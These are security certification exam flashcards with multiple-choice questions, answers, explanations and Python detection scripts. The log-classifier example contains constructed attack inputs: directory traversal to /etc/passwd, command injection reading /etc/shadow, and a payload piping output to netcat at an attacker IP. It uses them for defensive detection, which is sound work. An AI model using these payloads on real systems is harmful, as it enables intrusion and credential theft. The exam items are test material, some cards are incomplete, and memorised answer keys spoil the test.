comptia exam 151-200 Flashcards

1
Q

A SOC operator is analyzing a log file that contains the following entries:

Which of the following explains these log entries?

A. SQL injection and improper input-handling attempts
B. Cross-site scripting and resource exhaustion attempts
C. Command injection and directory traversal attempts
D. Error handling and privilege escalation attempts

A

C. Command injection and directory traversal attempts
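The log entries the question refers to are not reproduced on this page, so the classifier below, added here and not part of the original flashcards, runs over constructed access-log lines of its own. It shows the two patterns the answer names: "../" (or "..\") sequences in the request target for directory traversal, and shell metacharacters (; | ` $( &&) inside query parameters for command injection. It decodes the target twice so single- and double-URL-encoded variants are caught, and ignores a lone "&" because that is the normal parameter separator. The sample lines and the regexes are assumptions for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in combined log format; they are not the
# entries from the original question, only illustrations of the two patterns.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2023:13:55:36 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 512
10.0.0.5 - - [10/Mar/2023:13:55:40 +0000] "GET /cgi-bin/ping.sh?host=127.0.0.1;cat%20/etc/shadow HTTP/1.1" 500 0
10.0.0.5 - - [10/Mar/2023:13:55:44 +0000] "GET /download?file=..%252F..%252Fwin.ini HTTP/1.1" 404 0
10.0.0.7 - - [10/Mar/2023:13:56:01 +0000] "GET /products?id=42&sort=asc HTTP/1.1" 200 2048
10.0.0.5 - - [10/Mar/2023:13:56:10 +0000] "POST /api/run?cmd=ls%7Cnc%2010.0.0.5%204444 HTTP/1.1" 403 0
"""

# Request target inside the quoted request line of a combined-format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# "../" or "..\" anywhere in the decoded target: directory traversal.
TRAVERSAL_RE = re.compile(r'\.\.(/|\\)')
# Shell metacharacters that chain or substitute commands: ; | ` $( &&
CMD_INJECTION_RE = re.compile(r'[;|`]|\$\(|&&')


def classify_request(target: str) -> set:
    """Return the set of attack labels that apply to one request target."""
    # Decode twice so that double-encoded sequences such as %252F (-> %2F -> /)
    # are matched as well as single-encoded ones.
    decoded = unquote(unquote(target))
    labels = set()
    if TRAVERSAL_RE.search(decoded):
        labels.add("directory traversal")
    # Only inspect the query string; a lone "&" is the normal parameter
    # separator and is deliberately not treated as a shell operator.
    if "?" in decoded and CMD_INJECTION_RE.search(decoded.split("?", 1)[1]):
        labels.add("command injection")
    return labels


def classify_log(log_text: str) -> list:
    """Return (target, sorted labels) for every entry that matches an attack pattern."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match is None:
            continue
        labels = classify_request(match.group("target"))
        if labels:
            findings.append((match.group("target"), sorted(labels)))
    return findings


if __name__ == "__main__":
    for target, labels in classify_log(SAMPLE_LOG):
        print(f"{', '.join(labels):>22}  {target}")
```

Running it flags four of the five constructed lines (the /products request is clean). A production rule would also normalise overlong UTF-8 and mixed-case encodings, which this illustration does not attempt.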

2
Q

A security incident has been resolved. Which of the following BEST describes the importance of the final phase of the incident response plan?

A. It examines and documents how well the team responded, discovers what caused the incident, and determines how the incident can be avoided in the future.
B. It returns the affected systems back into production once systems have been fully patched, data restored, and vulnerabilities addressed.
C. It identifies the incident and the scope of the breach, how it affects the production environment, and the ingress point.
D. It contains the affected systems and disconnects them from the network, preventing further spread of the attack or breach.

A

A. It examines and documents how well the team responded, discovers what caused the incident, and determines how the incident can be avoided in the future.

3
Q

HOTSPOT
Select the appropriate attack and remediation from each drop-down list to label the corresponding attack with its remediation.

INSTRUCTIONS
Not all attacks and remediation actions will be used.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:

A

Botnet -> Enable DDoS protection
RAT -> Disable remote access services
Worm -> Change default passwords
Keylogger -> 2FA using push
Backdoor -> Code review

4
Q

During the onboarding process, an employee needs to create a password for an intranet account. The password must include ten characters, numbers, and letters, and two special characters. Once the password is created, the company will grant the employee access to other company-owned websites based on the intranet profile. Which of the following access management concepts is the company most likely using to safeguard intranet accounts and grant access to multiple sites based on a user’s intranet account? (Choose two.)

A. Federation
B. Identity proofing
C. Password complexity
D. Default password changes
E. Password manager
F. Open authentication

A

A. Federation
C. Password complexity

5
Q

SIMULATION
An attack has occurred against a company.

INSTRUCTIONS
You have been tasked to do the following:
✑ Identify the type of attack that is occurring on the network by clicking on the attacker’s tablet and reviewing the output.
✑ Identify which compensating controls a developer should implement on the assets, in order to reduce the effectiveness of future attacks by dragging them to the correct server.
All objects will be used, but not all placeholders may be filled. Objects may only be used once.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

A

Cross

6
Q

SIMULATION
A systems administrator needs to install a new wireless network for authenticated guest access. The wireless network should support 802.1X using the most secure encryption and protocol available.

INSTRUCTIONS
Perform the following steps:
1. Configure the RADIUS server.
2. Configure the WiFi controller.
3. Preconfigure the client for an incoming guest. The guest AD credentials are:

User: guest01
Password: guestpass

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

A

Wifi Controller
SSID: CORPGUEST
SHARED KEY: Secret
AAA server IP: 192.168.1.20
PSK: Blank
Authentication type: WPA2-EAP-PEAP-MSCHAPv2
Controller IP: 192.168.1.10

Radius Server
Shared Key: Secret
Client IP: 192.168.1.10
Authentication Type: Active Directory
Server IP: 192.168.1.20

Wireless Client
SSID: CORPGUEST
Username: guest01
Userpassword: guestpass
PSK: Blank
Authentication type: WPA2-Enterprise

Note: WPA2-Enterprise with PEAP-MSCHAPv2 is the strongest combination the simulation offers. In a real deployment the client profile must also validate the RADIUS server's certificate; without that check a rogue access point presenting its own certificate can capture the MSCHAPv2 challenge/response.

7
Q

HOTSPOT
An incident has occurred in the production environment.

INSTRUCTIONS
Analyze the command outputs and identify the type of compromise.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:

A

Rootkit

RAT

8
Q

After a recent security incident, a security analyst discovered that unnecessary ports were open on a firewall policy for a web server. Which of the following firewall policies would be MOST secure for a web server?
A.

B.

C.

D.

A

D

9
Q

A large bank with two geographically dispersed data centers is concerned about major power disruptions at both locations. Every day each location experiences very brief outages that last for a few seconds. However, during the summer a high risk of intentional brownouts that last up to an hour exists, particularly at one of the locations near an industrial smelter. Which of the following is the BEST solution to reduce the risk of data loss?

A. Dual supply
B. Generator
C. UPS
D. POU
E. Daily backups

A

B. Generator

10
Q

Which of the following would be the BEST way to analyze diskless malware that has infected a VDI?

A. Shut down the VDI and copy off the event logs.
B. Take a memory snapshot of the running system.
C. Use NetFlow to identify command-and-control IPs.
D. Run a full on-demand scan of the root volume.

A

B. Take a memory snapshot of the running system.
Diskless (fileless) malware exists only in RAM. Shutting the VDI down destroys that evidence and a disk scan never sees it, so the memory image has to be captured first; NetFlow may later help find the command-and-control IPs but does not let you analyse the malware itself.

11
Q

Users are presented with a banner upon each login to a workstation. The banner mentions that users are not entitled to any reasonable expectation of privacy and access is for authorized personnel only. In order to proceed past that banner, users must click the OK button. Which of the following is this an example of?

A. AUP
B. NDA
C. SLA
D. MOU

A

A. AUP
A logon banner stating that use is for authorized personnel only and that there is no expectation of privacy is an acceptable use notice. An NDA governs disclosure of confidential information, not the terms of system use.

12
Q

The Chief Information Security Officer is concerned about employees using personal email rather than company email to communicate with clients and sending sensitive business information and PII. Which of the following would be the BEST solution to install on the employees’ workstations to prevent information from leaving the company’s network?

A. HIPS
B. DLP
C. HIDS
D. EDR

A

B. DLP
Endpoint DLP inspects outbound content for PII and other sensitive data and blocks it regardless of the channel, including personal webmail. EDR, HIPS and HIDS detect malicious behaviour; they do not classify and stop data leaving through a legitimate email session.

13
Q

On the way into a secure building, an unknown individual strikes up a conversation with an employee. The employee scans the required badge at the door while the unknown individual holds the door open, seemingly out of courtesy, for the employee. Which of the following social engineering techniques is being utilized?

A. Shoulder surfing
B. Watering-hole attack
C. Tailgating
D. Impersonation

A

C. Tailgating
The unknown individual uses the employee's badge swipe to pass through the door without authenticating. Shoulder surfing would be watching the employee enter a PIN or password.

14
Q

Two hospitals merged into a single organization. The privacy officer requested a review of all records to ensure encryption was used during record storage, in compliance with regulations. During the review, the officer discovered that medical diagnosis codes and patient names were left unsecured. Which of the following types of data does this combination BEST represent?

A. Personal health information
B. Personally identifiable information
C. Tokenized data
D. Proprietary data

A

A. Personal health information
Patient names combined with medical diagnosis codes are health information tied to identifiable people, which regulations treat as PHI. PII alone would be the names without the medical data.

15
Q

A company discovered that terabytes of data have been exfiltrated over the past year after an employee clicked on an email link. The threat continued to evolve and remain undetected until a security analyst noticed an abnormal amount of external connections when the employee was not working. Which of the following is the MOST likely threat actor?

A. Shadow IT
B. Script kiddies
C. APT
D. Insider threat

A

C. APT
A year-long exfiltration that began with a phishing link, evolved to stay undetected, and generated external connections while the employee was away from work points to an external, persistent actor operating through the compromised account, not to the employee acting as an insider.

16
Q

An untrusted SSL certificate was discovered during the most recent vulnerability scan. A security analyst determines the certificate is signed properly and is a valid wildcard. This same certificate is installed on the other company servers without issue. Which of the following is the MOST likely reason for this finding?

A. The required intermediate certificate is not loaded as part of the certificate chain.
B. The certificate is on the CRL and is no longer valid.
C. The corporate CA has expired on every server, causing the certificate to fail verification.
D. The scanner is incorrectly configured to not trust this certificate when detected on the server.

A

A. The required intermediate certificate is not loaded as part of the certificate chain.
The certificate is correctly signed and works on the other servers, so it is neither revoked nor signed by an expired CA; the one host is simply not sending the intermediate, so the scanner cannot build a chain to a trusted root. Confirm by comparing the chain this server sends (openssl s_client -connect host:443 -showcerts) with the chain from a server that passes the scan.

17
Q

A company wants to improve end users’ experiences when they log in to a trusted partner website. The company does not want the users to be issued separate credentials for the partner website. Which of the following should be implemented to allow users to authenticate using their own credentials to log in to the trusted partner’s website?

A. Directory service
B. AAA server
C. Federation
D. Multifactor authentication

A

C. Federation
Federation lets the partner site trust an assertion from the company's identity provider, so users sign in with their own credentials and no partner-issued accounts are needed.

18
Q

A company is under investigation for possible fraud. As part of the investigation, the authorities need to review all emails and ensure data is not deleted. Which of the following should the company implement to assist in the investigation?

A. Legal hold
B. Chain of custody
C. Data loss prevention
D. Content filter

A

A. Legal hold
A legal hold suspends normal deletion and retention so the emails are preserved for the investigation. Chain of custody documents the handling of evidence after it has been collected; it does not stop data from being deleted in the first place.

19
Q

A user wanted to catch up on some work over the weekend but had issues logging in to the corporate network using a VPN. On Monday, the user opened a ticket for this issue but was able to log in successfully. Which of the following BEST describes the policy that is being implemented?
A. Time-based logins
B. Geofencing
C. Network location
D. Password history

A

A. Time-based logins
The same user from the same place is refused on the weekend and accepted on Monday, so the only variable is the time of the attempt. Geofencing would depend on where the user was, not when they connected.

20
Q

A major political party experienced a server breach. The hacker then publicly posted stolen internal communications concerning campaign strategies to give the opposition party an advantage. Which of the following BEST describes these threat actors?

A. Semi-authorized hackers
B. State actors
C. Script kiddies
D. Advanced persistent threats

A

B. State actors

21
Q

A company is required to continue using legacy software to support a critical service. Which of the following BEST explains a risk of this practice?
A. Default system configuration
B. Unsecure protocols
C. Lack of vendor support
D. Weak encryption

A

C. Lack of vendor support
Legacy software that must be kept running no longer receives patches or security fixes from the vendor, so any new vulnerability stays exploitable; the other options are possible symptoms, not the underlying risk.

22
Q

A security analyst has been tasked with ensuring all programs that are deployed into the enterprise have been assessed in a runtime environment. Any critical issues found in the program must be sent back to the developer for verification and remediation. Which of the following BEST describes the type of assessment taking place?
A. Input validation
B. Dynamic code analysis
C. Fuzzing
D. Manual code review

A

B. Dynamic code analysis

23
Q

Which of the following can work as an authentication method and as an alerting mechanism for unauthorized access attempts?

A. Smart card
B. Push notifications
C. Attestation service
D. HMAC-based, one-time password

A

B. Push notifications

24
Q

A company has a flat network in the cloud. The company needs to implement a solution to segment its production and non-production servers without migrating servers to a new network. Which of the following solutions should the company implement?
A. Intranet
B. Screened subnet
C. VLAN segmentation
D. Zero Trust

A

C. VLAN segmentation

25
Q

The president of a regional bank likes to frequently provide SOC tours to potential investors. Which of the following policies BEST reduces the risk of malicious activity occurring after a tour?

A. Password complexity
B. Acceptable use
C. Access control
D. Clean desk

A

D. Clean desk

26
Q

A Chief Information Security Officer has defined resiliency requirements for a new data center architecture. The requirements are as follows:
* Critical fileshares will remain accessible during and after a natural disaster.
* Five percent of hard disks can fail at any given time without impacting the data.
* Systems will be forced to shut down gracefully when battery levels are below 20%.
Which of the following are required to BEST meet these objectives? (Choose three.)

A. Fiber switching
B. IaC
C. NAS
D. RAID
E. UPS
F. Redundant power supplies
G. Geographic dispersal
H. Snapshots
I. Load balancing

A

D. RAID
E. UPS
G. Geographic dispersal
Each requirement maps to one control: geographic dispersal keeps the fileshares reachable when one site is hit by a disaster, RAID absorbs the failure of a fraction of the disks without data loss, and a UPS supplies the battery level that triggers the graceful shutdown. IaC and NAS address neither disasters nor battery levels.

27
Q

Which of the following is a security best practice that ensures the integrity of aggregated log files within a SIEM?

A. Set up hashing on the source log file servers that complies with local regulatory requirements.
B. Back up the aggregated log files at least two times a day or as stated by local regulatory requirements.
C. Write protect the aggregated log files and move them to an isolated server with limited access.
D. Back up the source log files and archive them for at least six years or in accordance with local regulatory requirements.

A

C. Write protect the aggregated log files and move them to an isolated server with limited access.
The question is about the aggregated copy in the SIEM. Hashing on the source servers (A) says nothing about what happens to the records after aggregation, and backups (B, D) preserve availability rather than integrity; write protection plus isolation limits who can alter the aggregated files.

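Write protection and isolation stop the aggregated files from being changed; a hash chain is the cheap way to prove afterwards that they were not. The example below is added here and is not from the original flashcards: each aggregated record is stored with a SHA-256 digest that also covers the previous record's digest, so editing, deleting or inserting any record breaks every link after it. The sample records, the "genesis" value and the record format are assumptions for this example.

```python
import hashlib

# Hash-chained aggregated log: each record's digest covers the previous digest,
# so inserting, deleting or editing any record changes every digest after it.
GENESIS = "0" * 64  # chain head before the first record; an assumed convention


def _link(prev_digest: str, record: str) -> str:
    """Digest of one record bound to the digest that precedes it."""
    return hashlib.sha256(f"{prev_digest}\n{record}".encode("utf-8")).hexdigest()


def chain_records(records, prev_digest=GENESIS):
    """Return [(record, digest), ...] with each digest chained to the previous one."""
    chained = []
    for record in records:
        prev_digest = _link(prev_digest, record)
        chained.append((record, prev_digest))
    return chained


def verify_chain(chained, prev_digest=GENESIS):
    """Return -1 if every link verifies, else the index of the first broken link."""
    for index, (record, digest) in enumerate(chained):
        if _link(prev_digest, record) != digest:
            return index
        prev_digest = digest
    return -1


# Constructed sample records (not from the page), as a SIEM might aggregate them.
SAMPLE_RECORDS = [
    "2023-03-10T08:00:01 fw01 DENY tcp 203.0.113.9:51000 -> 10.0.0.5:22",
    "2023-03-10T08:00:02 web01 GET /index.php?page=../../etc/passwd 200",
    "2023-03-10T08:00:03 dc01 4625 logon failure user=jsmith src=203.0.113.9",
    "2023-03-10T08:00:04 dc01 4740 account locked user=jsmith",
]

if __name__ == "__main__":
    chain = chain_records(SAMPLE_RECORDS)
    print("intact:", verify_chain(chain) == -1)
    # Rewrite the third record while keeping its stored digest: the link breaks there.
    tampered = chain[:]
    tampered[2] = ("2023-03-10T08:00:03 dc01 4624 logon success user=jsmith", chain[2][1])
    print("first broken link:", verify_chain(tampered))
```

The chain only proves anything if the latest digest is recorded somewhere the aggregated files are not writable (a separate host, a WORM store, or a periodic out-of-band note); an attacker who can rewrite the file can also recompute every digest, which is exactly why the control in answer C is isolation and write protection, with hashing as the verification layered on top.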
28
Q

A security analyst is evaluating the risks of authorizing multiple security solutions to collect data from the company's cloud environment. Which of the following is an immediate consequence of these integrations?

A. Non-compliance with data sovereignty rules
B. Loss of the vendors interoperability support
C. Mandatory deployment of a SIEM solution
D. Increase in the attack surface

A

D. Increase in the attack surface
Every integration is another set of credentials, API permissions and data paths into the cloud environment that can be abused if the third-party tool is compromised. Data sovereignty only becomes an issue if the collected data crosses a jurisdiction, which the question does not say.

29
Q

Which of the following explains why RTO is included in a BIA?

A. It identifies the amount of allowable downtime for an application or system.
B. It prioritizes risks so the organization can allocate resources appropriately.
C. It monetizes the loss of an asset and determines a break-even point for risk mitigation.
D. It informs the backup approach so that the organization can recover data to a known time.

A

A. It identifies the amount of allowable downtime for an application or system.

30
Q

A security analyst is reviewing web-application logs and finds the following log:

Which of the following attacks is being observed?

A. Directory traversal
B. XSS
C. CSRF
D. On-path attack

A

C. CSRF

31
Q

A security analyst is reviewing the vulnerability scan report for a web server following an incident. The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and a patch is available for the vulnerability. Which of the following is the MOST likely cause?

A. Security patches were uninstalled due to user impact.
B. An adversary altered the vulnerability scan reports.
C. A zero-day vulnerability was used to exploit the web server.
D. The scan reported a false negative for the vulnerability.

A

A. Security patches were uninstalled due to user impact.

32
Q

Which of the following is a known security risk associated with data archives that contain financial information?

A. Data can become a liability if archived longer than required by regulatory guidance.
B. Data must be archived off-site to avoid breaches and meet business requirements.
C. Companies are prohibited from providing archived data to e-discovery requests.
D. Unencrypted archives should be preserved as long as possible and encrypted.

A

A. Data can become a liability if archived longer than required by regulatory guidance.

33
Q

Which of the following BEST describes the process of documenting who has access to evidence?

A. Order of volatility
B. Chain of custody
C. Non-repudiation
D. Admissibility

A

B. Chain of custody

34
Q

A systems engineer wants to leverage a cloud-based architecture with low latency between network-connected devices that also reduces the bandwidth that is required by performing analytics directly on the endpoints. Which of the following would BEST meet the requirements? (Choose two.)

A. Private cloud
B. SaaS
C. Hybrid cloud
D. IaaS
E. DRaaS
F. Fog computing

A

C. Hybrid cloud
F. Fog computing

35
Q

Which of the following is a policy that provides a greater depth and breadth of knowledge across an organization?

A. Asset management policy
B. Separation of duties policy
C. Acceptable use policy
D. Job rotation policy

A

D. Job rotation policy

36
Q

A company is moving its retail website to a public cloud provider. The company wants to tokenize credit card data but not allow the cloud provider to see the stored credit card information. Which of the following would BEST meet these objectives?

A. WAF
B. CASB
C. VPN
D. TLS

A

B. CASB
A CASB sits between the company and the cloud provider and can tokenize or encrypt card data before it is stored, so the provider only ever holds tokens. TLS protects the data in transit and a VPN protects the tunnel, but both deliver the real card numbers to the provider.

37
Q

A security analyst is tasked with defining the "something you are" factor of the company's MFA settings. Which of the following is BEST to use to complete the configuration?

A. Gait analysis
B. Vein
C. Soft token
D. HMAC-based, one-time password

A

B. Vein

38
Q

Which of the following processes will eliminate data using a method that will allow the storage device to be reused after the process is complete?

A. Pulverizing
B. Overwriting
C. Shredding
D. Degaussing

A

B. Overwriting

39
Q

A user's account is constantly being locked out. Upon further review, a security analyst found the following in the SIEM:

Which of the following describes what is occurring?

A. An attacker is utilizing a password-spraying attack against the account.
B. An attacker is utilizing a dictionary attack against the account.
C. An attacker is utilizing a brute-force attack against the account.
D. An attacker is utilizing a rainbow table attack against the account.

A

C. An attacker is utilizing a brute-force attack against the account.

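The SIEM output is not reproduced on this page, so the example below, added here and not part of the original flashcards, works over constructed failed-logon records instead. It shows the shape that separates the two answers a SIEM can actually distinguish by counting: a brute-force attack is many failures against one account from one source (which is what trips the lockout in the question), while password spraying is one or two failures per account spread across many accounts, deliberately staying under the lockout threshold. The records, the field layout and the thresholds are assumptions for this example.

```python
from collections import defaultdict

# Constructed failed-logon records (timestamp, username, source IP, result).
# They stand in for the SIEM output the question refers to, which is not on this page.
SAMPLE_EVENTS = [
    (f"2023-03-10T08:00:{i:02d}", "jsmith", "203.0.113.9", "bad password")
    for i in range(1, 11)
] + [
    ("2023-03-10T08:00:11", "jsmith", "203.0.113.9", "account locked"),
    ("2023-03-10T09:00:00", "alice", "198.51.100.4", "bad password"),
    ("2023-03-10T09:00:01", "bob", "198.51.100.4", "bad password"),
    ("2023-03-10T09:00:02", "carol", "198.51.100.4", "bad password"),
    ("2023-03-10T09:00:03", "dave", "198.51.100.4", "bad password"),
    ("2023-03-10T09:00:04", "erin", "198.51.100.4", "bad password"),
    ("2023-03-10T10:15:00", "frank", "192.0.2.10", "bad password"),
    ("2023-03-10T10:15:30", "frank", "192.0.2.10", "bad password"),
]


def failures_by_source(events):
    """Count failed logons per source IP, broken down by target username."""
    counts = defaultdict(lambda: defaultdict(int))
    for _ts, user, src, _result in events:
        counts[src][user] += 1
    return counts


def classify_sources(events, brute_threshold=5, spray_threshold=4):
    """Label each source IP by the shape of its failures.

    brute-force:        many attempts against a single account; this is what
                        drives the repeated lockouts in the question.
    password-spraying:  few attempts per account across many accounts, which
                        stays below the lockout threshold on every one of them.
    The thresholds are assumptions for this example, not values from the page.
    """
    verdicts = {}
    for src, users in failures_by_source(events).items():
        total = sum(users.values())
        if len(users) == 1 and total >= brute_threshold:
            verdicts[src] = "brute-force"
        elif len(users) >= spray_threshold and max(users.values()) < brute_threshold:
            verdicts[src] = "password-spraying"
        else:
            verdicts[src] = "unclassified"
    return verdicts


if __name__ == "__main__":
    for src, verdict in classify_sources(SAMPLE_EVENTS).items():
        print(f"{src:<15} {verdict}")
```

Counting alone cannot tell a brute-force attack from a dictionary attack (both hammer one account; the difference is the password list), and a rainbow table attack is offline and produces no failed logons at all, which is why those two options are ruled out by the scenario rather than by the SIEM counts.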
40
Q

A web server has been compromised due to a ransomware attack. Further investigation reveals the ransomware has been in the server for the past 72 hours. The systems administrator needs to get the services back up as soon as possible. Which of the following should the administrator use to restore services to a secure state?

A. The last incremental backup that was conducted 72 hours ago
B. The last known-good configuration
C. The last full backup that was conducted seven days ago
D. The baseline OS configuration

A

C. The last full backup that was conducted seven days ago
The incremental from 72 hours ago falls inside the infection window and may restore the ransomware with the data; the seven-day-old full backup predates the compromise. A known-good configuration or OS baseline restores settings, not the server's content.

41
Q

A network engineer created two subnets that will be used for production and development servers. Per security policy production and development servers must each have a dedicated network that cannot communicate with one another directly. Which of the following should be deployed so that server administrators can access these devices?

A. VLANs
B. Internet proxy servers
C. NIDS
D. Jump servers

A

D. Jump servers
The separated subnets already exist; the question is how administrators reach both without the networks talking to each other. A jump server is a hardened, monitored host that administrators connect to first and then pivot from, so production and development stay isolated from one another.

42
Q

A social media company based in North America is looking to expand into new global markets and needs to maintain compliance with international standards. With which of the following is the company's data protection officer MOST likely concerned?

A. NIST Framework
B. ISO 27001
C. GDPR
D. PCI-DSS

A

C. GDPR
A data protection officer handling a consumer service expanding abroad is concerned with data-protection law that applies to the new users, and GDPR applies to anyone processing EU residents' personal data regardless of where the company sits. The NIST framework is US guidance, ISO 27001 is a management-system standard, and PCI DSS only covers card data.

43
Q

A security architect is required to deploy to conference rooms some workstations that will allow sensitive data to be displayed on large screens. Due to the nature of the data, it cannot be stored in the conference rooms. The file share is located in a local data center. Which of the following should the security architect recommend to BEST meet the requirement?

A. Fog computing and KVMs
B. VDI and thin clients
C. Private cloud and DLP
D. Full drive encryption and thick clients

A

B. VDI and thin clients

44
Q

A Chief Information Security Officer wants to ensure the organization is validating and checking the integrity of zone transfers. Which of the following solutions should be implemented?

A. DNSSEC
B. LDAPS
C. NGFW
D. DLP

A

A. DNSSEC

45
Q

Which of the following controls is used to make an organization initially aware of a data compromise?

A. Protective
B. Preventative
C. Corrective
D. Detective

A

D. Detective

46
Q

An annual information security assessment has revealed that several OS-level configurations are not in compliance due to outdated hardening standards the company is using. Which of the following would be BEST to use to update and reconfigure the OS-level security configurations?

A. CIS benchmarks
B. GDPR guidance
C. Regional regulations
D. ISO 27001 standards

A

A. CIS benchmarks

47
Q

A company acquired several other small companies. The company that acquired the others is transitioning network services to the cloud. The company wants to make sure that performance and security remain intact. Which of the following BEST meets both requirements?

A. High availability
B. Application security
C. Segmentation
D. Integration and auditing

A

D. Integration and auditing

48
Q

After a recent external audit, the compliance team provided a list of several non-compliant, in-scope hosts that were not encrypting cardholder data at rest. Which of the following compliance frameworks would address the compliance team's GREATEST concern?

A. PCI DSS
B. GDPR
C. ISO 27001
D. NIST CSF

A

A. PCI DSS

49
Q

A security analyst is receiving several alerts per user and is trying to determine if various logins are malicious. The security analyst would like to create a baseline of normal operations and reduce noise. Which of the following actions should the security analyst perform?

A. Adjust the data flow from authentication sources to the SIEM.
B. Disable email alerting and review the SIEM directly.
C. Adjust the sensitivity levels of the SIEM correlation engine.
D. Utilize behavioral analysis to enable the SIEM's learning mode.

A

D. Utilize behavioral analysis to enable the SIEM's learning mode.
Learning mode builds the baseline of normal login behaviour per user, after which only deviations alert. Turning off email alerts or lowering sensitivity hides the noise without establishing what normal looks like.

50
Q

Which of the following is the MOST effective way to detect security flaws present on third-party libraries embedded on software before it is released into production?

A. Employ different techniques for server- and client-side validations
B. Use a different version control system for third-party libraries
C. Implement a vulnerability scan to assess dependencies earlier on SDLC
D. Increase the number of penetration tests before software release

A

C. Implement a vulnerability scan to assess dependencies earlier on SDLC
Scanning dependencies (software composition analysis) during the build matches each third-party library and version against known vulnerabilities before the code ships. Penetration tests come late in the cycle and only find what the testers happen to exercise; they do not enumerate vulnerable libraries.